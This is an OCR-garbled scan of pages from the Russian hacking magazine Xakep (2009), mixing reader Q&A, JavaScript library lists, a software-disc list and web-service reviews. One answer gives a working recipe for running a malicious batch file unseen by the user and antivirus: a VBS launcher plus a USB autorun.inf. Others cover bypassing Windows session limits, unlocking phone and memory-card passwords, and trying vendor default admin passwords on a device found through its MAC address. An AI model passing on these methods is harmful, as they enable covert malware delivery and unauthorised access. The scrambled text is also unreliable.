3. jQueгy - известнейшая JаvаSсгiрt-библиоте·
ка IhtlQ:!/jguerv.conll
+ хороший набор компонентов
+ прозрачность разработки
4. Google Web Toolkit - инструментарий для
Java- разработчи ков от Google шtlр :!!code.
gQ.Qg le. com!'.-·"ebtoolkit]
+ все делается автометически

всего можно сделать? плагин для Mozllla Flrefox! и WIP-Map IIP-аАре­ - не совсем читабельный код на выходе

А: В таком нелегком деле тебе поможет замеча­ са прямо на карте).

тельная бесплатная программе от отечествен­ 3а подробностямиобращайся на официальный 5. Prototype - встроенная поддержка во фрей·
ных резработчи ков - Si te-Au ditor lофициаль­ сайт базы, адрес которого я дал выше мворке Rubyon Rails Ihttp:Uprotot\!peis.orgJ
ный сайт' slte·'JLIdltOr.гlll. + ла коничный синтаксис
При помощи утилиты Site-АuditоГТbIсможешь а: Подскажи, каким образом можно незаметно + простая в использовании

быстро собратьданные, которые будут необхо­ запустить.bat-фаЙn?

димы тебе для оценки видимостисайта во всех А:Допустим,у тебя есть злонамеренный 6. Mootools - очень компактая jаvаsсгiрt-биб­
поиско вых системах, а и ме н но: 5атниц. который ты планируешьзапуститьс лиотека Ihttp://mootools.net)
1. Индексы цитирования Яндекса - ТИЦ и помощью авторана С флешки. Для воплощения + быстрая
Google - РаgеRапk; своего плана в жизньдействуйследующим т компактная

2. Количество страниц, проиндексированных образом­ + модульная

поисковыми системами Яндекс, Рамблер, 1.СоздаЙ файл myfile vbs, в котором пропиши + много компонентов

Google. Апорт и Yahoo;

3. Количество ссылок на сайт, обнаруженных Set WshShell =
7. Moo.fx - основана на prototype и mootools
поисковыми системами Google, Яндекс, Yahoo; CreateObject ("WScript. Shell")
[htt рЛт 00 fx. mаd4гп ilk. ne t J
4.Данные о наличии сайта в каталогах Яндекс. WshShe 11. Run "cmd. ехе ! с [ТВОЙ_ВЮ'_
+ быстрая
Рамблер Тор1 00, Апорти OMOZ; ФАЙЛ]". О, false
+ очень компактная

5. Если на сайтебудутобнаруженысчетчики
Рамблер Тор 100, утилита соберет данные о 2. В авторан добавь следующие строки: 8. xajax - довольно распространенная и удоб­
количестве посетителей и просмотренных ная [ IIp:Uwww.xajaxproject.or.g1
страниц за последние 7 дней. [AutoRun]
+ удобная
Если будутобнаружены счетчики статисти­ UseAutoPlay=l
+ есть поддержка всего и вся (языки и т д]
ческих систе~~ Тор. Mail.ru, Livеlntегпеt IRaxJ. open=myfile."bs

SpyLog, HotLog, то будутданы ссылки на стра­ 9.saJax - компактная, но маловато функций

ницы этих ПОИСК08ЫХ систем. После этих нехитрых действий твой батник Ih tl Р :I/WW'N. ibm .com/deve lope rv;o rks!rLJ/libra rYl.
Помимо системы анализа сайта советую запустится и исполнится незаметно для юзера os-рhраjахJ
изучИ"Гь тебе десятки других 60зможностей и антивирусов. + компактная

программы, хотя мне самому больше всего - малофункций

нравится вкладка «Конкуренты», которая а: При изучении раЗЛИЧНblХвеб-движков

предназначенадля определения страниц сто· столкнулсяструдностямиВ виде мсnользовакия 1О.JsНТТРRеquеst 111Itp:Udklabru/lib!

ронних сайтов, конкурирующихс анализиру­ в HMx~eCATKOBвстраиваемыхаjах-библиотек. JsHttpRegllestl
емым сайтом по указанны'м запросам. На базе Подскажи,какие существуютос обенностму ... кроссбраузерность
данной информации можно легко понять, какие наибоnее nОnУnЯРКblХиз них? + совместимость С prototype

ХАКЕР 06 /116/ 09 ~1З9

 » urlits
+ автоматический выбор подх
загруз~и данных
11. MochiКit - на любителя 11, t : Пlосl1ikit.
соm/dО'v'mlоаd.htПll]
+ кроссбраузерность
+большойнаборфункц
- тяжелая
раузерность
+ большой набо р фун кций [более 2601
+хорошодокументирована ­ обмена нужно выполнить рядуслоеий, но если
тяжелая
а, Написал свой парсер/грабберна РНР, но
скрипт все время вы
етает •. Не знаешь, в чем
может быть причина?
А, Обычно, всяческие парсеры съедают просто
гигантское количествосерверных ресурсов,
так что самое ОПТVlмальноерешение в данном
случае - это поиграться С настройками рhр.IПI.
default_socket_tirneout = БОа (время
отва.лива.ния сокета по таймауту)
mах_ехесutiоп_timе = 300000 (мак­
СИl'1альное время выпQлне:н::ин ск.рипта f
ставь по вкусу)
rnax_input_time = БОа (максимальное
время для загрузки данных скрип~'ом)
mеmоry_liщit = 25БМ (если не жалко
операТИВi~ОЙ памяти, ставь побольще)
В целом же, все настройки РНР зависятот
ширины канала, так чтолучший опыт- это
эксперимент.
О: Как использовать обычный Windows ХР в
,качестветерм"нальногосервера Iterminal
serverl?
А, Не все знают, но на самом деле любая версия
ХР !как РгоfеSSlOпаl,так и Нотеl уже содержат
в себе терминальныйсервер, позволяющий
получитьудаленный рабочий стол по RPD.
Этот сервер искусственно огранич ен одн и м
подключением, при этом локальный рабочий
стол блокируется Впрочем, умельцы давно на­
шли решение того, как это глупое ограничение
обойти Утилита TS-Free - это, пожалуй, самый
распространенный хак, о КОТОром мы уже писа­
ли Про грамма заменяет библиотеку cгypt.dLL на
вариант из бета-версиVl дистрибутива ко второ­
му сервис паку 'где ограничение на количество
сеансов отсутствует). По такому же принципу
действуеттулза ТеГПllsегv_ХРSР2j386. Чуть
более навороченные возможности предлагает
программа ХРUпllmitеd [V\I\N'N.xDunlimited,corn),
у которой есть как платная, так И бесплатная
ва риаци и, ОДНОЙ из фич явл яется SSL Gateway,
ПОЗВОЛЯЮЩИЙ осуществить RPD-коннект
поверх защищенного соеДVlнения. WinConnect
Seгver ХР lWV'iW.еflЛJ/sоfl/wiпсоппесtsегvеГХD/ завести бан~овскую карточку на специ­
index.htmJ является полноценной реализацией
терминального сервиса, но, увы, стоит денег_
Раз уж мы заговорили отерминальном сервере,
~140
есть каки о ограничениядля
российскихпользователей?
А:Да, для пользователей из России существу­
ют особые пра в ила Vlспользо ва н ия системой
PayPal. ЗавесТVI счет можно и при вязать ~ нему
кредитную карточку - тоже. Но использовать
такой аккаунт разрешается исключительно для
оплаты товаров и услуг в "нтернете - ПрVlни­
мать платежи И тем более обнаЛИЧVlтьденьги
нельзя При попытеe отправить платеж на такой
аккаунт выдается ошибка о том, что адресат
принимать платежи не может. На русский
пей пал нельзя зачVlСЛИТЬ деньги даже со своей
собственной карты. Все платежи с русского
пей пела проходяттранзитом, снимаются
деньги с карты и после этого мгновенно, без
заЧVlсления на пейпел, уходят в магазин. В
общем, ситуация - труба.
Hol Есть обходные пути. Плюс в том, что
они есть в принципе, а минус - в том, что
их использование требует дополнительных
затрат Один из основных вариантов принять
платеж через пейпал для русских - получить
аккаунтvепdог'а на сервисе 2Checkoul C0I11.
Это - специальный сервисдля людей, ко­
торые занимаются коммерцией винтернете,
предоставляет "М виртуальную площадку для
торговли и систему для приема оплаты това­
ров. Зарегистрировав aK~aYHT на 2CI1eckout,
пользователь получает в системе счетс
виртуальными деньгами, на который теперь
будут переводиться деньги с проведенных им
продаж. Фишка в том, ЧТО помимо платежей
по кредитным картам (что тоже неплохо l ) и
прочих видов оплаты, пользователи могут ис­
пользовать PayPal- и денежки с такого пла­
тежа попадут на внутренний счет 2Checkout. А
уже откуда их можно вывести l
В результате имеем простую схему. Получа­
ем аккаунт вендора на 2Checkout Iзто стоит
$49], далее создаем некий 'говар (например,
дизайнi, который нужно выложить на своей
торговой странице, и передаем линкдля
оплаты нашему ~лиенту Тот про изводит
оплату - 11, ву-а-ля, деньги оказываются на
ВНУ'греннем счету чекаута. Теперь следую­
щий вопрос - как их оттуда вывести? Боль­
шинство матерых фрилансеров рекомендуют
альном сервисе Рауопеег [www.payoneer-.
,:omJ. Это настоящая пластиковая карта,
которая после оформления придет по почте,
OJ)
о
и ее можно будет использовать в обычн
банкомате, Плюс рауопеег'ой карточки
заключается в том, что ее можно привя
своему аккаунту на 2Checkout'e и выв дить
оттуда деньги С внутреннего счета. Р бятам,
которые держат сервисы. тоже нужно
то жить, ПОЭТDМУ за свои услуги они взимают
КОмиссии.
ДРУГОЙ вариантпоявился относительно
недавно. Врунете появилисьобменнVlКИ
Iлегко ищутся через Google, не будем делать
рекламу], готовые осуществить обмен с PayPal
на WеЬmопеt и Яндекс,Деньги. Для такого
аккаунтна РауРаL'етвой иты готов немножко
подождать [операция может занять несколько
дней], то этот способ - для тебя. Тут мы опять
имеем дело с комиссией, но зато значительно
меньшим геморроем, чем со связкой 2Checkout
и Рауопеег,
О: Нужно перепроwитьзаблокированную <~Ho­
кию», Ка кзто лучше САелать?
А,Любой опытный настройщик тебе OTBeTVIТ
одно - воспользоваться СВЯЗКОЙ РhоеПIХ и JAF,
Это лучшие сервисные программы для Inepel
прошивки, настройки итестирования телефо­
нов Nokia. На форуме httD:Шогum,аllпоklа ru/
vle\'Vlopic phD?t~44556 можно скачать готовые
сборки со следующими возможностями:
• Прошивка телефона в Normal и Dead - режи­
мах (РtlОеПIХ, JAF];
• Dоwпgгаdiпg - откат на более раннюю вер­
сию прошивки IJAF];
• Phoenix Вгоwsег - просмотр И работа со
!скрытыми] папками и файлами втелефоне
[Phoenixl;
• MobiMB Browser - работа через USB,
8luetooth,IrDa со !скрытымиl папкамVI И файла­
ми IMobiMBI;
• Закачка прошивокдля любого телефона и
продукт-кода прямо с серверов Nokia [РhоеПIХ)
• Полноценная работа с Producl Profile через
'_ppu [Рhоепiх)
• Format С - форматирование внутренней
памяти телефона без перепрошивки [Phoenix,
JAF]
• Простое сохранение и восстановление на­
строек Product ProflLe через ',рр [РhоеПIХ, JAF};
• Сохранение, восстановление, редактиро­
вание телефонной книги через Рr10пеЬооk.tхt
[Phoenlx)
• Сохранение, восстановление Permanent
Метогу IРМ] телефона или отдельныхблоков
[PllOenlX, JAF];
• Смена продукт-кода [РhоепiХ,JАF);
• Вскрытие защитного кода телефона IJAF,
Nokla U п lockerJ;
• Вскрытие пароля карты памяти [Nokia
Unlocker);
• Снятие скриншотов с экрана телефона, в том
числе сjаvа-игр ИJаvа-приложений IPhoenix);
• Множество других настроектелефона, до­
ступных на вкладке Теstiпg IРhоепiх);
• Новые «горячие клавиши» в Phoenix: F5­
Normal Mode, F6- Local Mode. F7 - Test Mode,:JC
ХАКЕР 06 /126/ а9
 '"
/

"WIHOOWS St.llo,ium 0.10.2 OIA 0.97 .!:!ш.ill!~_

,Oailysolt ТаоВсапп., 5.1.540Ь E,lnce 2.27.1 qBltlorr.nt 1.3.3
Нlр 4.85 Yideoln'p••to, 2.2.2.121 FI".nce O~4.1 .I!!!JllsnI0.9.5
AIMP 2.51 FonlmaUi,O.4.2 ,То"еп! 0.8.2
A.,"''!!МL. ______ ,Не! Fo!oll б.9.2 T,an.mission1.61

ОАЕМОМ Tool. lit1! 4.30.3 Аwазu 2.4 F,eeCAO 0.7 1.••Tube Oovrnlosde,. 1.8
OownJoad Mssl., 5.5.11.1187 C/o,.loop Free"88k 0.3.0
FerPowerP.;t 1.15 0'091. Ch,om. 3.0.182.2 Вв!а Fllnlka 0.5.1 >Securit,
Flle~~.3.2.4.1 Ko,lo WlnRo,l. Firow.llб.б.О keyTo••h 2.4.1 ~uSec4.21
К·Ша Меоо Codoc Pa.k 4.80 ~Meln Free 4.0.784 K'd31.2 МШ'·9.11
Ml"nds 1М 0.7.19 Ma.thon B,ow,e, 2.5.1 KOHI •• ~,.O.O Fwsnort 1.0.8 ww·w.xakep.ru
Mo,llla FI,ofo. 3.0.1 О myib;YT.o.40 LiYES 0.9.9.8 КеоРшХ 0.4.0
Hotopad++ 5.3.1 NolC,"nch 5.2 ~.!!:!'!1!P 0.1.2 Моllllпjесtо,о.з
~rаg.б4 О,Ы! Oownlooder 2.8.11 Op.nXMLYiowor 1.0 OneSlxtj O'!!JI. 3•2 /,.m,)I,nd
Pum 0.80 Pid9in 2.5.б PorkbIn.!1d. Itl·ltlnmedla
~
QIP Inll,m ИС4 8.ild 9030 Р,; 0.12.1 QPOFMe'go 1.0 ~lm:.L.~ ;=~
Щро 4.04.0 Rom,to Pro.esв E.plorer 2.0.0.1 g Rem,,, 0.0.2 ~.mural
~-~
0.5
Тоtзl Command" 7.04. ~'y'p~-'O! Windows 4.1.0 sMPlaye, 0.5.7 5а,а 7.0.4

"­
~~
Unlocka, 1.8.7 twhi,10.9.2 Suboonl.3.5 Sshutou! 1.0.5
Xokop СО Оаt.Sаш 5.2 UllroSu,[ 9.4 ,СНМ 1.16
;;~:
Th!.n.1 4.21
ХпУ!е. 1.9б ~~.c.mXP 5.3.4.118 TL5Wrsp 1.04
_~O
-....0
!Ч!l!Щ.1.1
~~Copi"5.1 !pdI3.02 T.!."OCryPt б.2 .~---11I
--~

a~

,Oe,elopment WinlDl
Adobe Rash Cal.ly.t 1.0 Bota ,Оеуоl >Server
HeldlSQL 4.0 ,50c"'i!, ~oO.4.4 Abyss W!!.!!,,,, Х1 2.6
HtlpWotoh B..lc Edl!lo I1JJ.J.L-. ElШ'IрI2.9.0
Clojure 1.0 Апотоп ОНСР ,о"а! 0.4
!!Ш!.~!ffiJ> 5.3.2 M"lti Password Иесо,еry IМРИ)
011I"00.3.3 AOlso"or 4.5.1
Micro,oH Web Platlo,m In'lalle, 1.1.5 ~.!!>0Ikl!I.3.1 Asto,isk 1-:-6.1--:0
2.08ata 5ру М..,аое 1.0.0.0 GiftW,ap 0.1 ЮаЬЬеrd 2.0.5
..
йтт tЕd 5.23 ш.~ry.Ptб.2 CSQL 0.2.1 I,a"o,d 2.5.5
Hiphl;l!ht 2.9 Ma,aDNS 1.3.01.09
>Games ,Sys!em .ill.!!IJI.dale14 Мo.toydO.9.2
And Уеl 1I Моуе. Oemo 1.0.3 #п Wlndow. 0.8.0 Klo.e 2.2.0 MyONS1M
COo"В0i4т'Г ЗОР СЫр 9.05 Коmрш, 0.7.10 !O!.nIO.I.S9

Robo.odo 1.7.1.2 Almera М,ШSеt P,olO$lI,nal б.6 ~4.1.2.1 ~~!K~4

ашl! Home Edltlon 4.8 !9.g1~ppj·0 Ope.5SH 5.2
>Misc g.~~JlМ!.~.J.~З log4j 1.2.15 !ocks~1).!
8en'bI'd POF 1.4.0.1 08lpoI1.4.2 !!.~~р.~пе, 1.0 W.ball,,, 2.21
.Oilact Folders Н Оо'Ыо Ьпщ 2.1 S.,TE 1.77 w,dftР.~.!l9.З
~~e.ulo, 0.99 Pri5m 1.0ы1 Sсrа"пlоts 0.1.2 ХМаil1.25
Fence.0.95 fu!~edFan 4.39 8Fkot "'ОЕ 1.8.16
t~.!!l!_~nu 2•.ЧО beta 9 Sysin!",al. S,lte B.lld 050709 ХРо.Wз XMl Edito, 1.0.0.2 ,Sysl.m
CmaH Н,Шlе. Plu, 1.0 !~!!!.~~!,mand.' (В_ЩI.50 Bota 4 ~!... 8~k'p 1.1.1
!!!pl'lio Р", .. паl Oa.hboa,iS-.1­ Y/rt,aI80, 2.2.4 ,Соте, ~
L090.SI,dlo YI.ta 1 pokorТH 0.1 80СЬ' 2.4
!I10mln'o 2.1 ,12 пучшиi ТУЛ3 ДЛЯ Wi·Fi ~--"-I~'!1~. F,е.ЛlоSYпс 1.18
PSGla&S ~l!Plack·ns.! .0·"З SudokuII0.9.14 ~~.~rt.d O,,!,S_
~.!ilio, Мапапо! 1.6.3 A.loap 2.2 Llnux Ka,.el 2.6.29.4
Vlsp" 0.5.1 CommYi.w 'о, WlFi б.1 ,Но! М!.!.Q!У monitor 1.1
lo.KEY 2.1.1 inSSlDe' 1.2 Bela а"п;Мо, 0.2 oVldla 180.60
Кi,m.t·2009·0S·ИС2 AutoScsn 1.42 !!!1~.!!.BEdito, 2.5.0
,Multlmedi. Na!S!,mbIor 0.4.0 BltWI•• 1.1.3 Reallek A'dlo Codecs 5.1!
Ble.der 2.49 Т.сhпltium МАС Address СЬа.о" FlroFoI 3.0.10 StopOuplicate. 1.4 Beta
B"nA;~e F,e' 2.з.5-=== ,5 R.le!~. 3 FI.ck 2.5 ~J,,7
СССР (C,mbinod Communit, C,doc Vi,t,mber 9.3 IcePoddo.5.4 ~!!!.3.4.0
IМPDMEllA Slmple СЬа! 0.5.3

WinServe 12~ЛЗ
Pa.kj 2009·05·08 VoJd11 0.2.0
dоРОFб.2 WI11100 '.3 Кt,аН;сапаl,-,е, 0.4.0·' ,X·di,I,

Wi,oless 5ec.,i" A,dilo, 1.02 KYl,c 3.4.2

f9rmet Fac!ory 1.85 Menl!')'s 2009.1
для ва :црайвинга
Medi.Monke, 3.0.1.1191 WlrоlшКеуУlеw 1.26 Ml,lo 0.З.1 2,OOSR2 и пенте та Wi-Fi
Но,о Шо 8.3.13.0
~------
~iсшl'!. "UHIX SIM 1М 0.~4.3 ВО3МQЖ~9Ст.и новоЙ
Pol8drold 0.9.6,ОЬ ,Oesktop Twl!UX О.ЗВ
iПiPriпtо, 2.5 - Audaclous 2.0.! ~ltFI' О&Ч. се:J!>верНQЙ ,винды
~90YB б.06.4 ._._ _ _ _ Audeclty 1.3.1 ~0IUg81.1.9 <>тр.11'4
Sc,e,,,ho\ Captor 2.56.01 ~.oooп С.!.'!!!!!!.IJ!I." 4.1.0 IП"rent 3.2.1
http:/

liгJ 8-800-100-Ш2

IIpd.lr.
Cl'>9os~ tr,~ (1Ie ус;.о W8"1'1O trrp Sh4let>ee ""II'~I:~ ~~& jll: t~ L"~.ore cft~el.!<l1er'ilalUlatк! ..... ~
oMnear.dllpk!a~i8lSh8rtt>er. Uveralflella'li1!j18!I'IIDES. D~ 'e~'~ ,r.t! up:llkd W!I~P Р~~бf~.

About Sharebee: !.'!(J PJeaw _МБУ:; use If:e $flaret;e;;; l,'nK [О 8\'D:d ce;~o.'J, VII'1 COtr1ore /hellju;: UDfoaa.

Тhank you 1ог u,lпg our eervlce! ShoгeblE!O СОПl r. 811)0% free service.
'l'our li!als ПOV, being I,Ip[oa(l8<l~

"" 'mC-S~l::n(.оt27К6isес~~~КDl2.3tl1.19

~_n~

Удобная все-таки штука -файлообменники Только вот пользователям

не угодить: одни не любят rapidshare, другим ­ подавай файл только на
deposltflles. Чтобы разом избавиться от всех проблем, рекомендую исполь­
зоватьтакой классный инструмент, как Sharebee.com. Он сам заливает файл

Миллион ресурсов позволяет вести списки дел, составлять календарь сразу на несколько файлообменникови выдает готовые линки на скачку.

и создавать разл и чные заметки, Но этот умопомрачительн ы й сервис Теперь можно быть уверенным. что файл не сотрут, а все желающие С макси­

уделал всех' Теперь записать идею, добавить событие в календарь или, мальным удобством смогут его скачать.

например, оставить запись в твиттере и жж можно при помощь ПрОС1'ого

звонка с телефона l Надо лишь набрать беспла1'НЫЙ номер 8-800-' 00-3342
дождаться ответа робота и сказать ему то, что нужно сделать. Сервис прос
то чума: робот идеально распознает голос и выполняет нужные действия.
Взял на вооружение «Все ли сделал» с первых минут общения идо сих ПОр' RU Е"

не понимаю, с;то можно придумать удобнее?

1'here аге 13 n~зnut-<!Iс(uгеrs m~t(hlng

[;i1teiCorpQrдtjМ---' -'-IООd~ОЬ71
InteJ corporaoon @[j]G0[J)@
IШШТ1тгtrптm тп 11'IIТI
!1~t'~1 cO!"J'.~a!lon 1:000"092
jlnte,' co.~poretlo.~_ ;ioOaaOJ.
rr;tё; (orpor~tiOfJ ~О~аз~Ю
~~-n--@.o902i
!~~~;00207b'
Iln_teJ corpor'!ltilln - jOOOe9_c; ВЫЯСНЯЕМ ПРОИ3ВОДИ­ 26%
I'n~el corporat1on
~e' corpor~tlQn
I<;IO.Oc:fl
[Offii7ё9' ТЕЛЯ УСТРОЙСТВА ПО ЕГО na.:an~la. псдa,:r,!tЖ1l. ПРСI~еQДIfТСЯ noepelltOДLfPOi8
СlраниЦ';'1
ф8linl. Не оБНОlilV:йrое

![~~~CCQIR~~JJ9n М--[ООО42З'
[Intet соrроГМiOn---!ОООЗ47 МАС-АДРЕСУ
!I,:,~~I t:Q(po~ti~~ :ООО2ЬЗ
J!n~~ .corpO(iI~ron.· hr.!::о<?,IОЯ~J?~~

,~
FINDAMAC ~
•
Этот сайт представляет собой базу данных по производителям сетевого
оборудования и их идентификаторам в МАС-адресе устройств, Первые 6
Сервис для перекодироваНИf18идеов формат, удобный для просмотра на
мобильных устройствах. Понятно, что зака чи вать 700 Мб фа йл с фильмом

на сервис не вариант, но зато Епсоdеlt позволяет импортировать видео

с Youtube, Rutube и социальной сети VKonta kte, на которых зачастую
цифр МАС' а, как правило, н еиз менны для производителя, лоэтому, указа в выкладывают целые фильмы, Тебе надолишьуказатьлинк. выбрать свой
их Flпdаmас'у, можно узнать, какое оборудование установлено на уда­ девайс и нужное качество кодирования - после чего получитьготовый
ленной стороне. Адальше -- крутиться от полученной инфы. Например, файлик. Вдвойне приятно, что разработкой Encodelt занимается наш _._11II.
попробоватьиспользоватьстандартныйдля вендора пароль админки читатель.

~144 ХАКЕР 06 '1261 09